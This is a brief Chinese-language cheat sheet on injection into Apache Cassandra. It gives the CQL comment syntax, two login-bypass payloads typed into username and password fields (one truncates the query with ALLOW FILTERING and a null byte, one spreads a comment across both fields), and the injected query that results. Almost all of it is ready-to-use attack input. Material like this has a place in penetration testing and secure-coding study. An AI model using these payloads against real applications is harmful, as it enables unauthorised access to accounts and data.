Cassandra注入
Apache Cassandra 是一个免费开源的分布式宽列存储 NoSQL 数据库管理系统。
Comment
/* Cassandra Comment */登录绕过
1.
username: admin' ALLOW FILTERING; %00
password: ANY
2.
username: admin'/*
password: */and pass>'注入
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;